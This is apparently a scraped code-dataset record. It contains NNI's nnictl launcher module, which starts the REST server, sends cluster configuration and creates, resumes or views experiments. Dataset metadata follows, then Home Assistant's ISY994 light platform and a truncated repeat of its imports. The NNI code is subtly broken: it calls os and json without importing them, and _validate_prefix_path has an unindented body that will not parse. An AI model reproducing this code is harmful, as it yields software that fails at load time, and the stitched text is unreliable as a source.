from pathlib import Path
import sys
import string
import random
import time
import tempfile
import re
from subprocess import Popen, check_call, CalledProcessError, PIPE, STDOUT
from nni.experiment.config import ExperimentConfig, convert
from nni.tools.annotation import expand_annotations, generate_search_space
from nni.tools.package_utils.tuner_factory import get_builtin_module_class_name
from .launcher_utils import validate_all_content
from .rest_utils import rest_put, rest_post, check_rest_server, check_response
from .url_utils import cluster_metadata_url, experiment_url, get_local_urls, set_prefix_url
from .config_utils import Config, Experiments
from .common_utils import get_yml_content, get_json_content, print_error, print_normal, detect_port, get_user
from .constants import NNI_HOME_DIR, ERROR_INFO, REST_TIME_OUT, EXPERIMENT_SUCCESS_INFO, LOG_HEADER
from .command_utils import check_output_command, kill_command
from .nnictl_utils import update_experiment
k8s_training_services = ['kubeflow', 'frameworkcontroller', 'adl']
def get_log_path(experiment_id):
    '''Create the experiment's log folder (if needed) and return the
    (stdout, stderr) nnictl log file paths.'''
    os.makedirs(os.path.join(NNI_HOME_DIR, experiment_id, 'log'), exist_ok=True)
    stdout_full_path = os.path.join(NNI_HOME_DIR, experiment_id, 'log', 'nnictl_stdout.log')
    stderr_full_path = os.path.join(NNI_HOME_DIR, experiment_id, 'log', 'nnictl_stderr.log')
    return stdout_full_path, stderr_full_path
def print_log_content(config_file_name):
    '''Print the experiment's nnictl stdout and stderr log contents.'''
    stdout_full_path, stderr_full_path = get_log_path(config_file_name)
    print_normal(' Stdout:')
    print(check_output_command(stdout_full_path))
    print('\n\n')
    print_normal(' Stderr:')
    print(check_output_command(stderr_full_path))
def start_rest_server(port, platform, mode, experiment_id, foreground=False, log_dir=None, log_level=None, url_prefix=None):
    '''Launch the node-based NNI manager (main.js) as a subprocess.

    Returns (subprocess handle, start timestamp in milliseconds). Exits the
    process if the requested port — or, for most platforms, the adjacent
    port — is already in use.
    '''
    # Refuse to start when the requested port is already occupied.
    if detect_port(port):
        print_error('Port %s is used by another process, please reset the port!\n' \
        'You could use \'nnictl create --help\' to get help information' % port)
        exit(1)
    # Non local/aml platforms additionally need port+1 free.
    if (platform not in ['local', 'aml']) and detect_port(int(port) + 1):
        print_error('%s mode need an additional adjacent port %d, and the port %d is used by another process!\n' \
        'You could set another port to start experiment!\n' \
        'You could use \'nnictl create --help\' to get help information' % (platform, (int(port) + 1), (int(port) + 1)))
        exit(1)
    print_normal('Starting restful server...')
    import nni_node
    # The bundled node runtime and entry script live inside the nni_node package.
    entry_dir = nni_node.__path__[0]
    if (not entry_dir) or (not os.path.exists(entry_dir)):
        print_error('Fail to find nni under python library')
        exit(1)
    entry_file = os.path.join(entry_dir, 'main.js')
    if sys.platform == 'win32':
        node_command = os.path.join(entry_dir, 'node.exe')
    else:
        node_command = os.path.join(entry_dir, 'node')
    cmds = [node_command, '--max-old-space-size=4096', entry_file, '--port', str(port), '--mode', platform, \
        '--experiment_id', experiment_id]
    cmds += ['--action', mode]
    if log_dir is not None:
        cmds += ['--experiments-directory', log_dir]
    if log_level is not None:
        cmds += ['--log-level', log_level]
    if foreground:
        cmds += ['--foreground', 'true']
    if url_prefix:
        _validate_prefix_path(url_prefix)
        set_prefix_url(url_prefix)
        cmds += ['--url-prefix', url_prefix.strip('/')]
    stdout_full_path, stderr_full_path = get_log_path(experiment_id)
    with open(stdout_full_path, 'a+') as stdout_file, open(stderr_full_path, 'a+') as stderr_file:
        start_time = time.time()
        time_now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(start_time))
        # Stamp both log files with a timestamped header.
        log_header = LOG_HEADER % str(time_now)
        stdout_file.write(log_header)
        stderr_file.write(log_header)
        if sys.platform == 'win32':
            # New process group so Ctrl+C in the parent does not kill the manager.
            from subprocess import CREATE_NEW_PROCESS_GROUP
            if foreground:
                process = Popen(cmds, cwd=entry_dir, stdout=PIPE, stderr=STDOUT, creationflags=CREATE_NEW_PROCESS_GROUP)
            else:
                process = Popen(cmds, cwd=entry_dir, stdout=stdout_file, stderr=stderr_file, creationflags=CREATE_NEW_PROCESS_GROUP)
        else:
            if foreground:
                process = Popen(cmds, cwd=entry_dir, stdout=PIPE, stderr=PIPE)
            else:
                process = Popen(cmds, cwd=entry_dir, stdout=stdout_file, stderr=stderr_file)
    return process, int(start_time * 1000)
def set_trial_config(experiment_config, port, config_file_name):
    '''Send the trial configuration to the REST server; return True on success.'''
    request_data = dict()
    request_data['trial_config'] = experiment_config['trial']
    response = rest_put(cluster_metadata_url(port), json.dumps(request_data), REST_TIME_OUT)
    if check_response(response):
        return True
    else:
        # NOTE(review): response.text is accessed before the `if response:`
        # guard below — if the REST call can return None this line crashes;
        # confirm rest_put's failure contract.
        print('Error message is {}'.format(response.text))
        _, stderr_full_path = get_log_path(config_file_name)
        if response:
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
        return False
def set_adl_config(experiment_config, port, config_file_name):
    '''Push adl cluster metadata plus common V1 settings to the REST server.

    Returns (success, error_message); error_message is None on success.
    '''
    adl_config_data = dict()
    # Empty adl_config payload — placeholder for V2-config support.
    adl_config_data['adl_config'] = {}
    response = rest_put(cluster_metadata_url(port), json.dumps(adl_config_data), REST_TIME_OUT)
    err_message = None
    if not response or not response.status_code == 200:
        if response is not None:
            err_message = response.text
            _, stderr_full_path = get_log_path(config_file_name)
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
        return False, err_message
    set_V1_common_config(experiment_config, port, config_file_name)
    result, message = setNNIManagerIp(experiment_config, port, config_file_name)
    if not result:
        return result, message
    # Finally push the trial configuration.
    return set_trial_config(experiment_config, port, config_file_name), None
def validate_response(response, config_file_name):
    '''Exit the process unless *response* is a successful (HTTP 200) reply,
    logging the error body to the experiment's stderr log when present.'''
    err_message = None
    if not response or not response.status_code == 200:
        if response is not None:
            err_message = response.text
            _, stderr_full_path = get_log_path(config_file_name)
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
        # NOTE(review): when response is None, err_message is still None here
        # and this concatenation raises TypeError — consider a default message.
        print_error('Error:' + err_message)
        exit(1)
def set_V1_common_config(experiment_config, port, config_file_name):
    '''Push the version-check and log-collection settings shared by V1 platforms.

    Exits the process (via validate_response) when either REST call fails.
    '''
    version_check = True
    # Debug mode disables the version check.
    if experiment_config.get('debug') is not None:
        version_check = not experiment_config.get('debug')
    # An explicit versionCheck setting overrides the debug-derived value.
    if experiment_config.get('versionCheck') is not None:
        version_check = experiment_config.get('versionCheck')
    response = rest_put(cluster_metadata_url(port), json.dumps({'version_check': version_check}), REST_TIME_OUT)
    validate_response(response, config_file_name)
    if experiment_config.get('logCollection'):
        data = json.dumps({'log_collection': experiment_config.get('logCollection')})
        response = rest_put(cluster_metadata_url(port), data, REST_TIME_OUT)
        validate_response(response, config_file_name)
def setNNIManagerIp(experiment_config, port, config_file_name):
    '''Push the nniManagerIp setting when configured.

    Returns (success, error_message); a missing nniManagerIp counts as success.
    '''
    if experiment_config.get('nniManagerIp') is None:
        return True, None
    ip_config_dict = dict()
    ip_config_dict['nni_manager_ip'] = {'nniManagerIp': experiment_config['nniManagerIp']}
    response = rest_put(cluster_metadata_url(port), json.dumps(ip_config_dict), REST_TIME_OUT)
    err_message = None
    if not response or not response.status_code == 200:
        if response is not None:
            err_message = response.text
            _, stderr_full_path = get_log_path(config_file_name)
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
        return False, err_message
    return True, None
def set_kubeflow_config(experiment_config, port, config_file_name):
    '''Push kubeflow cluster metadata plus common V1 settings to the REST server.

    Returns (success, error_message); error_message is None on success.
    '''
    kubeflow_config_data = dict()
    kubeflow_config_data['kubeflow_config'] = experiment_config['kubeflowConfig']
    response = rest_put(cluster_metadata_url(port), json.dumps(kubeflow_config_data), REST_TIME_OUT)
    err_message = None
    if not response or not response.status_code == 200:
        if response is not None:
            err_message = response.text
            _, stderr_full_path = get_log_path(config_file_name)
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
        return False, err_message
    set_V1_common_config(experiment_config, port, config_file_name)
    result, message = setNNIManagerIp(experiment_config, port, config_file_name)
    if not result:
        return result, message
    # Finally push the trial configuration (err_message is None here).
    return set_trial_config(experiment_config, port, config_file_name), err_message
def set_frameworkcontroller_config(experiment_config, port, config_file_name):
    """Push the frameworkcontroller cluster config, then common/trial configs.

    Args:
        experiment_config: parsed experiment configuration dict.
        port: port the local rest server listens on.
        config_file_name: experiment id used to locate the stderr log file.

    Returns:
        ``(success, err_message)`` — same contract as ``set_kubeflow_config``.
    """
    frameworkcontroller_config_data = dict()
    frameworkcontroller_config_data['frameworkcontroller_config'] = experiment_config['frameworkcontrollerConfig']
    response = rest_put(cluster_metadata_url(port), json.dumps(frameworkcontroller_config_data), REST_TIME_OUT)
    err_message = None
    if not response or not response.status_code == 200:
        if response is not None:
            err_message = response.text
            # Guarded: when the server never replied, err_message is None and
            # json.loads(None) would raise TypeError.
            _, stderr_full_path = get_log_path(config_file_name)
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
        return False, err_message
    set_V1_common_config(experiment_config, port, config_file_name)
    result, message = setNNIManagerIp(experiment_config, port, config_file_name)
    if not result:
        return result, message
    return set_trial_config(experiment_config, port, config_file_name), err_message
def set_shared_storage(experiment_config, port, config_file_name):
    """Push the optional shared-storage config to the rest server.

    Args:
        experiment_config: parsed experiment configuration dict.
        port: port the local rest server listens on.
        config_file_name: experiment id used to locate the stderr log file.

    Returns:
        ``(True, None)`` on success or when no ``sharedStorage`` section is
        present; ``(False, err_message)`` on a failed rest call.
    """
    if 'sharedStorage' in experiment_config:
        data = json.dumps({'shared_storage_config': experiment_config['sharedStorage']})
        response = rest_put(cluster_metadata_url(port), data, REST_TIME_OUT)
        err_message = None
        if not response or not response.status_code == 200:
            if response is not None:
                err_message = response.text
                # Guarded: when the server never replied, err_message is None
                # and json.loads(None) would raise TypeError.
                _, stderr_full_path = get_log_path(config_file_name)
                with open(stderr_full_path, 'a+') as fout:
                    fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
            return False, err_message
    return True, None
def set_experiment_v1(experiment_config, mode, port, config_file_name):
    """Build the V1 (legacy schema) creation payload and POST it to the rest server.

    Args:
        experiment_config: parsed V1 experiment configuration dict.
        mode: launch mode ('create' / 'resume' / 'view'); currently unused here.
        port: port the local rest server listens on.
        config_file_name: experiment id used to locate the stderr log file.

    Returns:
        The rest response on success, ``None`` on failure (error body is
        appended to the experiment's stderr log).
    """
    request_data = dict()
    request_data['authorName'] = experiment_config['authorName']
    request_data['experimentName'] = experiment_config['experimentName']
    request_data['trialConcurrency'] = experiment_config['trialConcurrency']
    request_data['maxExecDuration'] = experiment_config['maxExecDuration']
    # Duplicate several fields under both the legacy and the new key names so
    # either server schema can read them.
    request_data['maxExperimentDuration'] = str(experiment_config['maxExecDuration']) + 's'
    request_data['maxTrialNum'] = experiment_config['maxTrialNum']
    request_data['maxTrialDuration'] = experiment_config['maxTrialDuration']
    request_data['maxTrialNumber'] = experiment_config['maxTrialNum']
    request_data['searchSpace'] = experiment_config.get('searchSpace')
    request_data['trainingServicePlatform'] = experiment_config.get('trainingServicePlatform')
    request_data['trainingService'] = {'platform': experiment_config.get('trainingServicePlatform')}
    # Optional top-level settings are copied through only when present/truthy.
    if experiment_config.get('description'):
        request_data['description'] = experiment_config['description']
    if experiment_config.get('multiPhase'):
        request_data['multiPhase'] = experiment_config.get('multiPhase')
    if experiment_config.get('multiThread'):
        request_data['multiThread'] = experiment_config.get('multiThread')
    if experiment_config.get('nniManagerIp'):
        request_data['nniManagerIp'] = experiment_config.get('nniManagerIp')
    # An advisor replaces the tuner/assessor pair; only one of the two
    # branches below is taken.
    if experiment_config.get('advisor'):
        request_data['advisor'] = experiment_config['advisor']
        if request_data['advisor'].get('gpuNum'):
            print_error('gpuNum is deprecated, please use gpuIndices instead.')
        # A bare int gpuIndices is normalized to its string form.
        if request_data['advisor'].get('gpuIndices') and isinstance(request_data['advisor'].get('gpuIndices'), int):
            request_data['advisor']['gpuIndices'] = str(request_data['advisor'].get('gpuIndices'))
    else:
        request_data['tuner'] = experiment_config['tuner']
        if request_data['tuner'].get('gpuNum'):
            print_error('gpuNum is deprecated, please use gpuIndices instead.')
        if request_data['tuner'].get('gpuIndices') and isinstance(request_data['tuner'].get('gpuIndices'), int):
            request_data['tuner']['gpuIndices'] = str(request_data['tuner'].get('gpuIndices'))
        if 'assessor' in experiment_config:
            request_data['assessor'] = experiment_config['assessor']
            if request_data['assessor'].get('gpuNum'):
                print_error('gpuNum is deprecated, please remove it from your config file.')
    # debug implies versionCheck off, but an explicit versionCheck wins.
    if experiment_config.get('debug') is not None:
        request_data['versionCheck'] = not experiment_config.get('debug')
    if experiment_config.get('versionCheck') is not None:
        request_data['versionCheck'] = experiment_config.get('versionCheck')
    if experiment_config.get('logCollection'):
        request_data['logCollection'] = experiment_config.get('logCollection')
    # Platform-specific cluster metadata travels inside the same request.
    request_data['clusterMetaData'] = []
    if experiment_config['trainingServicePlatform'] == 'kubeflow':
        request_data['clusterMetaData'].append(
            {'key': 'kubeflow_config', 'value': experiment_config['kubeflowConfig']})
        request_data['clusterMetaData'].append(
            {'key': 'trial_config', 'value': experiment_config['trial']})
    elif experiment_config['trainingServicePlatform'] == 'frameworkcontroller':
        request_data['clusterMetaData'].append(
            {'key': 'frameworkcontroller_config', 'value': experiment_config['frameworkcontrollerConfig']})
        request_data['clusterMetaData'].append(
            {'key': 'trial_config', 'value': experiment_config['trial']})
    elif experiment_config['trainingServicePlatform'] == 'adl':
        request_data['clusterMetaData'].append(
            {'key': 'trial_config', 'value': experiment_config['trial']})
    response = rest_post(experiment_url(port), json.dumps(request_data), REST_TIME_OUT, show_error=True)
    if check_response(response):
        return response
    else:
        # On failure, persist the server's error body for later inspection.
        _, stderr_full_path = get_log_path(config_file_name)
        if response is not None:
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
            print_error('Setting experiment error, error message is {}'.format(response.text))
        return None
def set_experiment_v2(experiment_config, mode, port, config_file_name):
    """POST a V2 (new schema) experiment config to the rest server.

    Args:
        experiment_config: canonical V2 configuration dict.
        mode: launch mode ('create' / 'resume' / 'view'); unused here.
        port: port the local rest server listens on.
        config_file_name: experiment id used to locate the stderr log file.

    Returns:
        The rest response on success, ``None`` on failure (error body is
        appended to the experiment's stderr log).
    """
    payload = json.dumps(experiment_config)
    response = rest_post(experiment_url(port), payload, REST_TIME_OUT, show_error=True)
    if check_response(response):
        return response
    # Failure path: record the server's reply (when there was one) and bail.
    _, stderr_full_path = get_log_path(config_file_name)
    if response is not None:
        with open(stderr_full_path, 'a+') as fout:
            fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
        print_error(f'Setting experiment error, error message is {response.text}')
    return None
def set_platform_config(platform, experiment_config, port, config_file_name, rest_process):
    """Dispatch the per-platform cluster config, then the shared-storage config.

    On any failure the rest server process is killed and the CLI exits.

    Args:
        platform: training service platform name ('adl' / 'kubeflow' /
            'frameworkcontroller').
        experiment_config: parsed experiment configuration dict.
        port: port the local rest server listens on.
        config_file_name: experiment id used to locate log files.
        rest_process: the rest server subprocess, killed on failure.
    """
    print_normal('Setting {0} config...'.format(platform))
    config_result, err_msg = None, None
    if platform == 'adl':
        config_result, err_msg = set_adl_config(experiment_config, port, config_file_name)
    elif platform == 'kubeflow':
        config_result, err_msg = set_kubeflow_config(experiment_config, port, config_file_name)
    elif platform == 'frameworkcontroller':
        config_result, err_msg = set_frameworkcontroller_config(experiment_config, port, config_file_name)
    else:
        # Removed an unreachable exit(1) that followed this raise.
        raise Exception(ERROR_INFO % 'Unsupported platform!')
    if config_result:
        config_result, err_msg = set_shared_storage(experiment_config, port, config_file_name)
    if config_result:
        print_normal('Successfully set {0} config!'.format(platform))
    else:
        print_error('Failed! Error is: {}'.format(err_msg))
        try:
            kill_command(rest_process.pid)
        except Exception:
            raise Exception(ERROR_INFO % 'Rest server stopped!')
        exit(1)
def launch_experiment(args, experiment_config, mode, experiment_id, config_version):
    """Start the rest server and launch (or resume/view) an experiment.

    Args:
        args: parsed CLI namespace (port, debug, foreground, url_prefix, ...).
        experiment_config: parsed configuration dict (V1 or V2 schema).
        mode: 'create', 'resume' or 'view'.
        experiment_id: eight-character experiment identifier.
        config_version: 1 for the legacy schema, 2 for the new schema.
    """
    # Pre-flight: verify the chosen builtin tuner/advisor package is importable.
    package_name, module_name = None, None
    if experiment_config.get('tuner') and experiment_config['tuner'].get('builtinTunerName'):
        package_name = experiment_config['tuner']['builtinTunerName']
        module_name, _ = get_builtin_module_class_name('tuners', package_name)
    elif experiment_config.get('advisor') and experiment_config['advisor'].get('builtinAdvisorName'):
        package_name = experiment_config['advisor']['builtinAdvisorName']
        module_name, _ = get_builtin_module_class_name('advisors', package_name)
    if package_name and module_name:
        try:
            stdout_full_path, stderr_full_path = get_log_path(experiment_id)
            with open(stdout_full_path, 'a+') as stdout_file, open(stderr_full_path, 'a+') as stderr_file:
                # Import in a subprocess so a broken package cannot corrupt
                # the CLI process itself.
                check_call([sys.executable, '-c', 'import %s'%(module_name)], stdout=stdout_file, stderr=stderr_file)
        except CalledProcessError:
            print_error('some errors happen when import package %s.' %(package_name))
            print_log_content(experiment_id)
            if package_name in ['SMAC', 'BOHB', 'PPOTuner']:
                print_error(f'The dependencies for {package_name} can be installed through pip install nni[{package_name}]')
            raise
    # Resolve the log directory / level; the key differs between schemas.
    if config_version == 1:
        log_dir = experiment_config['logDir'] if experiment_config.get('logDir') else NNI_HOME_DIR
    else:
        log_dir = experiment_config['experimentWorkingDirectory'] if experiment_config.get('experimentWorkingDirectory') else NNI_HOME_DIR
    log_level = experiment_config['logLevel'] if experiment_config.get('logLevel') else 'info'
    foreground = False
    if mode != 'view':
        foreground = args.foreground
        if log_level not in ['trace', 'debug'] and (args.debug or experiment_config.get('debug') is True):
            log_level = 'debug'
    # A list-valued V2 trainingService means a hybrid (multi-platform) run.
    if config_version == 1:
        platform = experiment_config['trainingServicePlatform']
    elif isinstance(experiment_config['trainingService'], list):
        platform = 'hybrid'
    else:
        platform = experiment_config['trainingService']['platform']
    # Start the rest server and register the experiment locally.
    rest_process, start_time = start_rest_server(args.port, platform, \
                        mode, experiment_id, foreground, log_dir, log_level, args.url_prefix)
    Experiments().add_experiment(experiment_id, args.port, start_time,
                                 platform,
                                 experiment_config.get('experimentName', 'N/A')
                                 , pid=rest_process.pid, logDir=log_dir, prefixUrl=args.url_prefix)
    # NNI annotation: expand annotated trial code into a temp dir and derive
    # the search space from it.
    if experiment_config.get('useAnnotation'):
        path = os.path.join(tempfile.gettempdir(), get_user(), 'nni', 'annotation')
        if not os.path.isdir(path):
            os.makedirs(path)
        path = tempfile.mkdtemp(dir=path)
        if config_version == 1:
            nas_mode = experiment_config['trial'].get('nasMode', 'classic_mode')
            code_dir = expand_annotations(experiment_config['trial']['codeDir'], path, nas_mode=nas_mode)
            experiment_config['trial']['codeDir'] = code_dir
        else:
            code_dir = expand_annotations(experiment_config['trialCodeDirectory'], path)
            experiment_config['trialCodeDirectory'] = code_dir
        search_space = generate_search_space(code_dir)
        experiment_config['searchSpace'] = search_space
        assert search_space, ERROR_INFO % 'Generated search space is empty'
    elif config_version == 1:
        # Without annotation, V1 reads the search space from a file (or
        # leaves it empty).
        if experiment_config.get('searchSpacePath'):
            search_space = get_json_content(experiment_config.get('searchSpacePath'))
            experiment_config['searchSpace'] = search_space
        else:
            experiment_config['searchSpace'] = ''
    # Confirm the rest server actually came up before talking to it.
    running, _ = check_rest_server(args.port)
    if running:
        print_normal('Successfully started Restful server!')
    else:
        print_error('Restful server start failed!')
        print_log_content(experiment_id)
        try:
            kill_command(rest_process.pid)
        except Exception:
            raise Exception(ERROR_INFO % 'Rest server stopped!')
        exit(1)
    # V1 pushes cluster metadata before creating the experiment.
    if config_version == 1 and mode != 'view':
        set_platform_config(experiment_config['trainingServicePlatform'], experiment_config, args.port,\
                            experiment_id, rest_process)
        print_normal('Starting experiment...')
    if mode != 'view' and experiment_config.get('debug') is None:
        experiment_config['debug'] = args.debug
    if config_version == 1:
        response = set_experiment_v1(experiment_config, mode, args.port, experiment_id)
    else:
        response = set_experiment_v2(experiment_config, mode, args.port, experiment_id)
    if response:
        if experiment_id is None:
            experiment_id = json.loads(response.text).get('experiment_id')
    else:
        print_error('Start experiment failed!')
        print_log_content(experiment_id)
        try:
            kill_command(rest_process.pid)
        except Exception:
            raise Exception(ERROR_INFO % 'Restful server stopped!')
        exit(1)
    # Report the web-ui URLs and record them in the local experiment registry.
    url_prefix_format = '' if args.url_prefix is None else '/{0}'.format(args.url_prefix)
    if experiment_config.get('nniManagerIp'):
        web_ui_url_list = ['http://{0}:{1}{2}'.format(experiment_config['nniManagerIp'], str(args.port), url_prefix_format)]
    else:
        web_ui_url_list = get_local_urls(args.port, url_prefix_format)
    Experiments().update_experiment(experiment_id, 'webuiUrl', web_ui_url_list)
    print_normal(EXPERIMENT_SUCCESS_INFO % (experiment_id, ' '.join(web_ui_url_list)))
    # Foreground mode: stream the rest server's stdout until Ctrl-C.
    if mode != 'view' and args.foreground:
        try:
            while True:
                log_content = rest_process.stdout.readline().strip().decode('utf-8')
                print(log_content)
        except KeyboardInterrupt:
            kill_command(rest_process.pid)
            print_normal('Stopping experiment...')
def _validate_v1(config, path):
    """Validate a legacy (V1 schema) config file; exit the CLI on failure."""
    try:
        validate_all_content(config, path)
    except Exception as err:
        print_error('Config V1 validation failed: {}'.format(repr(err)))
        exit(1)
def _validate_v2(config, path):
    """Validate a V2 config file and return its canonical JSON form.

    Args:
        config: raw YAML content of the config file.
        path: path to the config file (relative paths resolve against its
            directory).

    Returns:
        The canonical configuration dict; exits the CLI on validation failure.
    """
    base_path = Path(path).parent
    try:
        conf = ExperimentConfig(_base_path=base_path, **config)
        return conf.json()
    except Exception as e:
        print_error(f'Config V2 validation failed: {repr(e)}')
        # Mirror _validate_v1: without this exit the function fell through
        # returning None, and create_experiment later launched with a None
        # config, producing an opaque crash.
        exit(1)
def _validate_prefix_path(path):
assert not path.startswith('/'), 'URL prefix should not start with "/".'
parts = path.split('/')
valid = all(re.match('^[A-Za-z0-9_-]*$', part) for part in parts)
assert valid, 'URL prefix should only contain letter, number, underscore, and hyphen.'
def create_experiment(args):
    """CLI entry point for ``nnictl create``: validate the config and launch.

    Args:
        args: parsed CLI namespace; ``args.config`` is the YAML config path.
    """
    # Experiment ids are eight random alphanumeric characters.
    experiment_id = ''.join(random.sample(string.ascii_letters + string.digits, 8))
    config_path = os.path.abspath(args.config)
    if not os.path.exists(config_path):
        print_error('Please set correct config path!')
        exit(1)
    config_yml = get_yml_content(config_path)
    # 'trainingServicePlatform' only exists in the legacy (V1) schema.
    if 'trainingServicePlatform' in config_yml:
        _validate_v1(config_yml, config_path)
        platform = config_yml['trainingServicePlatform']
        if platform in k8s_training_services:
            # k8s platforms still go through the V1 code path.
            schema = 1
            config_v1 = config_yml
        else:
            # Everything else is converted to the V2 schema.
            schema = 2
            config_v2 = convert.to_v2(config_yml).json()
    else:
        config_v2 = _validate_v2(config_yml, config_path)
        schema = 2
    try:
        if schema == 1:
            launch_experiment(args, config_v1, 'create', experiment_id, 1)
        else:
            launch_experiment(args, config_v2, 'create', experiment_id, 2)
    except Exception as exception:
        # Best effort: kill the rest server if it was already registered.
        restServerPid = Experiments().get_all_experiments().get(experiment_id, {}).get('pid')
        if restServerPid:
            kill_command(restServerPid)
        print_error(exception)
        exit(1)
def manage_stopped_experiment(args, mode):
    """Resume or view a stopped experiment registered on this machine.

    Args:
        args: parsed CLI namespace; ``args.id`` selects the experiment.
        mode: 'resume' or 'view'.
    """
    update_experiment()
    experiments_config = Experiments()
    experiments_dict = experiments_config.get_all_experiments()
    experiment_id = None
    if not args.id:
        print_error('Please set experiment id! \nYou could use \'nnictl {0} id\' to {0} a stopped experiment!\n' \
                    'You could use \'nnictl experiment list --all\' to show all experiments!\n' \
                    'If your experiment is not started in current machine, you could specify experiment folder using ' \
                    '--experiment_dir argument'.format(mode))
        exit(1)
    else:
        # The id must exist locally and the experiment must be STOPPED.
        if experiments_dict.get(args.id) is None:
            print_error('Id %s not exist!' % args.id)
            exit(1)
        if experiments_dict[args.id]['status'] != 'STOPPED':
            print_error('Only stopped experiments can be {0}ed!'.format(mode))
            exit(1)
        experiment_id = args.id
    print_normal('{0} experiment {1}...'.format(mode, experiment_id))
    experiment_config = Config(experiment_id, experiments_dict[args.id]['logDir']).get_config()
    experiments_config.update_experiment(args.id, 'port', args.port)
    # Reuse the URL prefix the experiment was originally started with.
    args.url_prefix = experiments_dict[args.id]['prefixUrl']
    assert 'trainingService' in experiment_config or 'trainingServicePlatform' in experiment_config
    try:
        # 'trainingServicePlatform' marks a V1 config; otherwise it is V2.
        if 'trainingServicePlatform' in experiment_config:
            experiment_config['logDir'] = experiments_dict[args.id]['logDir']
            launch_experiment(args, experiment_config, mode, experiment_id, 1)
        else:
            experiment_config['experimentWorkingDirectory'] = experiments_dict[args.id]['logDir']
            launch_experiment(args, experiment_config, mode, experiment_id, 2)
    except Exception as exception:
        # Best effort: kill the rest server if it was already registered.
        restServerPid = Experiments().get_all_experiments().get(experiment_id, {}).get('pid')
        if restServerPid:
            kill_command(restServerPid)
        print_error(exception)
        exit(1)
def view_experiment(args):
    """View a stopped experiment, from an external folder or the local registry."""
    handler = manage_external_experiment if args.experiment_dir else manage_stopped_experiment
    handler(args, 'view')
def resume_experiment(args):
    """Resume a stopped experiment, from an external folder or the local registry."""
    handler = manage_external_experiment if args.experiment_dir else manage_stopped_experiment
    handler(args, 'resume')
def manage_external_experiment(args, mode):
    """Resume or view an experiment from an explicit on-disk folder.

    Args:
        args: parsed CLI namespace; ``args.experiment_dir`` points at the
            experiment folder, ``args.id`` optionally names the experiment.
        mode: 'resume' or 'view'.
    """
    if not os.path.exists(args.experiment_dir):
        print_error('Folder %s does not exist!' % args.experiment_dir)
        exit(1)
    if not os.path.isdir(args.experiment_dir):
        print_error('Path %s is not folder directory!' % args.experiment_dir)
        exit(1)
    if args.id:
        experiment_id = args.id
        log_dir = args.experiment_dir
    else:
        # Fall back to interpreting the last path component as the id and its
        # parent as the log directory.
        print_normal('NNI can not detect experiment id in argument, will use last folder name as experiment id in experiment_dir argument.')
        experiment_id = Path(args.experiment_dir).name
        log_dir = str(Path(args.experiment_dir).parent)
        if not experiment_id:
            print_error("Please set experiment id argument, or add id as the last folder name in experiment_dir argument.")
            exit(1)
    args.url_prefix = None
    experiment_config = Config(experiment_id, log_dir).get_config()
    assert 'trainingService' in experiment_config or 'trainingServicePlatform' in experiment_config
    try:
        # 'trainingServicePlatform' marks a V1 config; otherwise it is V2.
        if 'trainingServicePlatform' in experiment_config:
            experiment_config['logDir'] = log_dir
            launch_experiment(args, experiment_config, mode, experiment_id, 1)
        else:
            experiment_config['experimentWorkingDirectory'] = log_dir
            launch_experiment(args, experiment_config, mode, experiment_id, 2)
    except Exception as exception:
        print_error(exception)
        exit(1)
| true | true |
f7261540ddd2002ae7277a840f8220797a974449 | 1,398 | py | Python | homeassistant/components/light/isy994.py | beschouten/home-assistant | f50c30bbbad4d92e342c8547630c63c0c7882803 | [
"MIT"
] | 1 | 2016-07-14T05:20:54.000Z | 2016-07-14T05:20:54.000Z | homeassistant/components/light/isy994.py | beschouten/home-assistant | f50c30bbbad4d92e342c8547630c63c0c7882803 | [
"MIT"
] | null | null | null | homeassistant/components/light/isy994.py | beschouten/home-assistant | f50c30bbbad4d92e342c8547630c63c0c7882803 | [
"MIT"
] | 1 | 2018-11-22T13:55:23.000Z | 2018-11-22T13:55:23.000Z | """
Support for ISY994 lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/isy994/
"""
import logging
from homeassistant.components.isy994 import (
HIDDEN_STRING, ISY, SENSOR_STRING, ISYDeviceABC)
from homeassistant.components.light import ATTR_BRIGHTNESS
from homeassistant.const import STATE_OFF, STATE_ON
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Setup the ISY994 light platform.

    Collects every dimmable node from the shared ISY connection and registers
    it as a light entity. Returns False when no controller is connected.
    """
    logger = logging.getLogger(__name__)
    devs = []
    if ISY is None or not ISY.connected:
        logger.error('A connection has not been made to the ISY controller.')
        return False
    # Import dimmable nodes; nodes whose name marks them as sensors are skipped.
    for (path, node) in ISY.nodes:
        if node.dimmable and SENSOR_STRING not in node.name:
            # Propagate the hidden marker from the folder path onto the name.
            # NOTE(review): this mutates the shared node object — confirm intended.
            if HIDDEN_STRING in path:
                node.name += HIDDEN_STRING
            devs.append(ISYLightDevice(node))
    add_devices(devs)
class ISYLightDevice(ISYDeviceABC):
    """Representation of an ISY dimmable light entity."""

    _domain = 'light'
    _dtype = 'analog'
    _attrs = {ATTR_BRIGHTNESS: 'value'}
    _onattrs = [ATTR_BRIGHTNESS]
    _states = [STATE_ON, STATE_OFF]

    def _attr_filter(self, attr):
        """Drop the brightness attribute while the light is off."""
        if not self.is_on:
            attr.pop(ATTR_BRIGHTNESS, None)
        return attr
| 29.125 | 77 | 0.690272 | import logging
from homeassistant.components.isy994 import (
HIDDEN_STRING, ISY, SENSOR_STRING, ISYDeviceABC)
from homeassistant.components.light import ATTR_BRIGHTNESS
from homeassistant.const import STATE_OFF, STATE_ON
